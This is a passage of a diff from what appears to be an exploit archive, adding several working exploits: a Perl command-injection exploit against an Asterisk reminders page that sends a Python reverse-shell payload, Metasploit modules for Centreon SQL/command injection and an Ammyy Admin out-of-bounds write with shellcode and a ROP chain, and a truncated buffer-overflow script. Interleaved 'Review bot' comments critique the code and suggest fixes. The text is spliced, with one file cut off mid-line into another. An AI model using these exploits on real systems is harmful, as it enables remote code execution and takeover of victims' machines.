AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' +); +my $random = $array[rand @array]; +return($random); +} +my $useragent = randomagent(); + +my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); +$ua->timeout(10); +$ua->agent($useragent); +my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded"); +unless ($status->is_success) { +banner(); +print "[-] Error: " . $status->status_line . 
"\n"; +exit; +} + +banner(); +print "[*] MorXploiting $host/$vuln\n"; + +my $payload = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$cbhost\",$cbport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; +my $get = "APPTDA=morx&APPTPHONE=morx&APPTMO=morx&APPTMIN=;$payload;&APPTHR=morx"; +my $exploit = $ua->get("$host/$vuln?$get", Authorization => "Basic $encoded"); +print "[+] Sent payload! Waiting for connect back root shell ...\n"; + +my $a_sock = $l_sock->accept(); +$l_sock->shutdown(SHUT_RDWR); +copy_data_bidi($a_sock); + +sub copy_data_bidi { +my ($socket) = @_; +my $child_pid = fork(); +if (! $child_pid) { +close(STDIN); +copy_data_mono($socket, *STDOUT); +$socket->shutdown(SHUT_RD); +exit(); +} else { +close(STDOUT); +copy_data_mono(*STDIN, $socket); +$socket->shutdown(SHUT_WR); +kill("TERM", $child_pid); +} +} +sub copy_data_mono { +my ($src, $dst) = @_; +my $buf; +while (my $read_len = sysread($src, $buf, 4096)) { +my $write_len = $read_len; +while ($write_len) { +my $written_len = syswrite($dst, $buf); +return unless $written_len; +$write_len -= $written_len; +} +} +} \ No newline at end of file diff --git a/platforms/unix/remote/35078.rb b/platforms/unix/remote/35078.rb new file mode 100755 index 000000000..1d6ce19e4 --- /dev/null +++ b/platforms/unix/remote/35078.rb 
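Review bot: The banner `print "[+] Sent payload! Waiting for connect back root shell ...\n";` promises a root shell, but the header's own description and the demo transcript (`uid=498(asterisk)`) show the injected command runs as the asterisk user, so `print "[+] Sent payload! Waiting for connect back shell ...\n";` is the accurate message. `$host2` and `$exploit` are assigned and never read and can be dropped. On the remediation side, the quoted vulnerable lines make the root cause explicit: the `str_replace` calls on the listed lines 380–382 strip only CR, LF and angle brackets before the values are concatenated into `system("sox $tmpwave -r 8000 -c 1 $newgsm")`, so shell metacharacters survive; the fix in reminders/index.php is to validate APPTHR/APPTMIN/APPTYR/APPTMO/APPTDA as digit-only and APPTPHONE as a digit string, and to pass each component through `escapeshellarg()` before building the command. For detection, a request to reminders/index.php whose APPT* parameters contain anything other than digits is a direct indicator, since the parameter names suggest their legitimate values are date, time and phone-number fragments.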
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Centreon SQL and Command Injection',
+ 'Description' => %q{
+ This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
+ Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
+ injection in the displayServiceStatus.php component, it is possible to execute arbitrary
+ commands as long as there is a valid session registered in the centreon.session table.
+ In order to have a valid session, all it takes is a successful login from anybody.
+ The exploit itself does not require any authentication.
+
+ This module has been tested successfully on Centreon Enterprise Server 2.2.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'MaZ', # Vulnerability Discovery and Analysis
+ 'juan vazquez' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-3828'],
+ ['CVE', '2014-3829'],
+ ['US-CERT-VU', '298796'],
+ ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
+ ],
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Payload' =>
+ {
+ 'Space' => 1500, # having into account 8192 as max URI length
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic python gawk bash-tcp netcat ruby openssl'
+ }
+ },
+ 'Targets' =>
+ [
+ ['Centreon Enterprise Server 2.2', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 15 2014',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/centreon'])
+ ], self.class)
+ end
+
+ def check
+ random_id = rand_text_numeric(5 + rand(8))
+ res = send_session_id(random_id)
+
+ unless res && res.code == 200 && res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+ return Exploit::CheckCode::Safe
+ end
+
+ injection = "#{random_id}' or 'a'='a"
+ res = send_session_id(injection)
+
+ if res && res.code == 200
+ if res.body && res.body.to_s =~ /sh: graph: command not found/
+ return Exploit::CheckCode::Vulnerable
+ elsif res.headers['Content-Type'] && res.headers['Content-Type'] == 'image/gif'
+ return Exploit::CheckCode::Detected
+ end
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ if check == Exploit::CheckCode::Safe
+ fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
+ elsif check == Exploit::CheckCode::Detected
+ fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?")
+ end
+
+ print_status("#{peer} - Exploiting...")
+ random_id = rand_text_numeric(5 + rand(8))
+ random_char = rand_text_alphanumeric(1)
+ session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
+ template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
+ res = send_template_id(session_injection, template_injection)
+
+ if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
+ vprint_status("Output: #{res.body}")
+ end
+ end
+
+ def send_session_id(session_id)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+ 'vars_get' =>
+ {
+ 'session_id' => session_id
+ }
+ )
+
+ res
+ end
+
+ def send_template_id(session_id, template_id)
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.to_s, 'include', 'views', 'graphs', 'graphStatus', 'displayServiceStatus.php'),
+ 'vars_get' =>
+ {
+ 'session_id' => session_id,
+ 'template_id' => template_id
+ }
+ }, 3)
+
+ res
+ end
+
+ def mysql_payload
+ p = ''
+ payload.encoded.each_byte { |c| p << "#{c},"}
+ p
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/local/35074.py b/platforms/windows/local/35074.py
new file mode 100755
index 000000000..98eca32d3
--- /dev/null
+++ b/platforms/windows/local/35074.py
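Review bot: In `exploit`, the guard evaluates `check` twice (`if check == Exploit::CheckCode::Safe` and again in the `elsif`), so the probe requests inside `check` are repeated and the two evaluations can disagree if the target's state changes between them. Evaluate it once and branch on the saved result: `code = check`, `if code == Exploit::CheckCode::Safe`, `elsif code == Exploit::CheckCode::Detected`. Separately, the Description says the issue affects Centreon 2.5.1 and prior as well as Centreon Enterprise Server 2.2 and prior, while Targets lists only 'Centreon Enterprise Server 2.2' and the text itself says only that version was tested; the Targets entry or a comment next to it should state that the other versions named in the description are untested so the module's metadata and its prose agree.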
@@ -0,0 +1,38 @@ +#!/usr/bin/env python +# Free WMA MP3 Converter 1.8 Buffer Overflow +# Version:1.8 Build 20140226 +# Author:metacom +# Date:10.23.2014 +# Download:http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm +# Tested on:Win7-En 32bit - Win8.1-DE 64bit +import struct +def little_endian(address): + return struct.pack(" 'Ammyy Admin Array Index Out-Of-Bounds', + 'Description' => %q{ + This exploit gains code execution on the controller side of Ammyy Admin from the controlled + side. To do this, it exploits an array index out-of-bounds write. The exploit uses the + relative OOB write to overwrite a return address on the thread stack, which is generally + mapped directly below the Ammyy image data, and retrying on the next thread stack in case + that was not the correct thread. + + There are two targets, one for immediate, direct shellcode execution taking advantage of + the fact that Ammyy does not opt-in to DEP, and the second, using a ROP-only exploit to + call LoadLibraryW with a remote UNC path. + + Since Ammyy Admin uses a crypto library that would be very time-consuming to reproduce and + multiple methods of setting up a connection (relay, direct, etc.) this exploit was written + to simply hook Ammyy Admin from an injected DLL, using its own code to handle the crypto and + connections, substituting the exploit for any data sent to the server. This module will + generate a file (exploit.dat) you must copy, along with aaexploit.exe, to a Windows VM. Run + aaexploit.exe, and wait for a connection. When you hit "accept" on the connection, the + exploit will be sent. + + This module has been tested successfully against Ammyy Admin 3.4 on Windows Vista 32-bit + and Windows 7 32 and 64-bit for direct (IP) connections only. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "scriptjunkie" Weeks ' + ], + 'References' => + [ + [ 'CVE', '2014-XXXX' ], + [ 'OSVDB', 'XXXX' ], + ], + 'Payload' => + { + 'Space' => 800, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Ammyy Admin 3.4 Direct', + { + 'Type' => 'direct', + 'Version' => '3.4' + } + ], + [ 'Ammyy Admin 3.4 Always-On DEP', + { + 'Type' => 'rop', + 'Version' => '3.4' + } + ], + [ 'Ammyy Admin 3.5 Direct', + { + 'Type' => 'direct', + 'Version' => '3.5' + } + ], + [ 'Ammyy Admin 3.5 Always-On DEP', + { + 'Type' => 'rop', + 'Version' => '3.5' + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => '', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('DLL_PATH', [ false, 'The DLL path to load for the DEP Always-On target.', + '\\\\1.2.3.4\\file.dll']), + OptString.new('FILENAME', [ true, 'The file name.', 'exploit.dat']), + ], self.class) + end + + # Takes a string of binary data, and generates a stroke set in the Ammyy protocol which will + # write that data to the specified col/row point on the remote side, skipping a given pixel if + # specified to avoid overwriting a particular local variable at the wrong time + def strokeSet(col, row, data, skip) + #minus one because the number of strokes is the number of pixels - 1 + numpixels = (data.length + 3) / 4 + numpixels -= 1 if skip != -1 # subtract again if you have a skip + + #03 XoffsetWord YoffsetWord DrawWidthWord DrawHeightWord + output = "\x03" + [col, row, numpixels, 1].pack('vvvv') + output << "XXXX" # end of packet signal to injector + + offset = -1 + #zero pad to 4 byte boundary; any extra is discarded in unpack("V*") + (data + "\x00\x00\x00").unpack('V*').each do |pixel| + offset += 1 + next if skip == offset # don't write this pixel if we're avoiding overwriting a var + + # Get pixel values from this 4-byte chunk + r, g, b, a = [pixel].pack("V").unpack("C*") + + # sanity check pixel value + print_error("Shellcode at 
pixel #{offset} invalid; has trailing 0") if a != 0 + + # We send pixels in 16 x 1 sections; each of which has its own header (0x1A) + if offset % 0x10 == 0 + # Chunk header; includes flags (0x1A), background color we use to set 1st pixel values, + # and number of strokes (pixels) remaining to send in this chunk + numstrokes = [0xF, numpixels - offset - 1].min + output << [0x1A, r, g, b, numstrokes].pack("C*") + else + # This is a stroke. A stroke can be multiple pixels wide or high, but we're just using + # them to write a single pixel each. Data format looks like this: + + # R G B [low nibble Y offset, high nibble X offset] + # [low nibble stroke height; high nibble stroke width] + + # since we're only using 1x1 strokes, we only set the X offset part of this + output << [r, g, b, (offset % 0x10) << 4, 0].pack("C*") + end + end + output << "XXXX" + output + end + + def exploit + # Injected dll divides packets to send by "XXXX" + # First we specify header data and global flags for the connection. 
+ sploit = "XXXX=XXXX" + sploit << "\x7E\xCC\xF5\xED\xB7\x16\x92\xE2\x96\xBD\xF3\xFF\xC0\xFF\x2D\x97\x69\xF2\xCA\x99" + sploit << "XXXX" + sploit << "\x00\x7F\x00\x00\x00" + sploit << "XXXX" + # send bogus system info + sploit << "\x3A\x00Windows\x006.0.6001 SP1.0\x00U_R_PWNED\x0AJan 01 2014 at 01:23:45\x00\x05" + sploit << "XXXX" + sploit << "\x15" + sploit << "XXXX" + # screen dimensions and stuff + sploit << "\x70\x03\x03\x65\x18\x00\xff\x00\xff\x00\xff\x00\x10\x08\x00\x20\x00\xff\x00\xff\x00" + sploit << "\xff\x00\x10\x08\x00\x20\x03\x58\x02" + sploit << "XXXX" + + if target['Version'] == '3.4' + offsets = { + 'push_esp_ret' => 0x004424a2, + 'pop_ebp_ret' => 0x004488bf, + 'loadlibW' => 0x0044C7B3, + 'pop_edi_ret' => 0x0045aba9, + 'pop_esi_ret' => 0x00460029, + 'pushad_ret' => 0x0045ed48, + 'ret' => 0x00430315 + } + else + offsets = { + 'push_esp_ret' => 0x004786cf, + 'pop_ebp_ret' => 0x00418086, + 'loadlibW' => 0x0044F079, + 'pop_edi_ret' => 0x00471639, + 'pop_esi_ret' => 0x0046003e, + 'pushad_ret' => 0x004615e8, + 'ret' => 0x004012C0 + } + end + + if target['Type'] == 'direct' + # shellcode must be in unicode format + first_payload = payload.encoded + encoder = framework.encoders.create("x86/unicode_mixed") + encoder.datastore.import_options_from_hash( {'BufferRegister'=> 'ESP' }) + unicode_payload = encoder.encode(first_payload, nil, nil, platform) + scode = unicode_payload.unpack("C*").pack("v*") + # actually not, but every 4th byte must be a 0 since we can only write the R G B parts of + # the pixel, and the pixels are stored as R G B A, which ends up being R G B 0, but we + # don't have a generic "every 4th byte must be null" encoder, so we just use the Unicode + # one, which works just fine. 
+ + # First stroke set will write the shellcode at the beginning of the screen buffer + sploit << strokeSet(0, 599, scode, -1) + + # Second write will be an OOB write that will overwrite the return address + # Then calculate address of shellcode and jump to the shellcode + # This will work most of the time + stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe + 0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var + stack << "\xB8\x3C\x01\x00\x00" + # mov eax, 0x13C + "\xEB\x01" + # jmp next + "\x00" + # has to be null + "\x01\xC4" + # next: add esp, eax + "\xEB\x00" + # jmp over mandatory null + "\xFF\xE4" # jmp esp + + # Return address is at 0325FEBC, when pixel data starts at 03360000. That's a 0x144 or 324 + # byte OOB overwrite from start of image, which is 81 pixels. So, with an 800x600 screen, + # we use a stroke set with X offset 719 and Y offset 600 (rows go down in address) + sploit << strokeSet(719, 600, stack, 1) + + # Third write will be second trigger, and may work if that fails + # it's pretty much the same thing except add another megabyte (default stack size) to esp + stack = [offsets['push_esp_ret'], # PUSH ESP # RETN in AA_v3.exe + 0x00000000].pack("V*") # not used since ret 4; must be skipped due to local var + stack << "\x81\xC4\x3C\x00\x01\x00" # add esp,0x1003c + "\xEB\x00" # jmp over mandatory null + "\xB8\x00\x01\x00\x00" # mov eax,0x100 + "\xEB\x01" + # jmp next + "\x00" + # has to be null + "\x01\xC4" + # next: add esp, eax + "\xEB\x00" + # jmp over mandatory null + "\xFF\xE4" # jmp esp + + # executing stack is 0x100000 below since default stack size is 1MB (0x100000 bytes); e.g. + # at 0347FEBC when image starts at 03580000. That's 0x40051 (or 262225) pixels back, which + # is 327 rows and then 625 pixels. 
So our X offset is 175 (AF) and Y offset is 927 + sploit << strokeSet(175, 927, stack, 1) + + elsif target['Type'] == 'rop' + # ROP target is all-in-one write that will overwrite the return address on the stack + # and end up calling LoadLibraryW with a UNC path + stack = [offsets['pop_ebp_ret'], # POP EBP # RETN [AA_v3.exe] + 0x00000000, # not used since ret 4; must be skipped due to local var + offsets['loadlibW'], # address of call LoadLibraryW + offsets['pop_edi_ret'], # POP EDI # RETN [AA_v3.exe] + offsets['ret'], # RETN + offsets['pop_esi_ret'], # POP ESI # RETN + offsets['ret'], # RETN + offsets['pushad_ret'], # PUSHAD # RETN jumps to edi, with esi, ebp, orig esp... above + ].pack("V*") + stack << datastore['DLL_PATH'].unpack("C*").pack("v*") + + # same offset logic as above + sploit << strokeSet(719, 600, stack, 1) + + # second try, same logic as above + sploit << strokeSet(175, 927, stack, 1) + end + + print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Now copy that, along with aaexploit.exe, to a Windows VM.") + print_status("Then run aaexploit.exe, and wait for a connection.") + print_status("Hit accept on a connection request to send the exploit.") + + file_create(sploit) + end + +end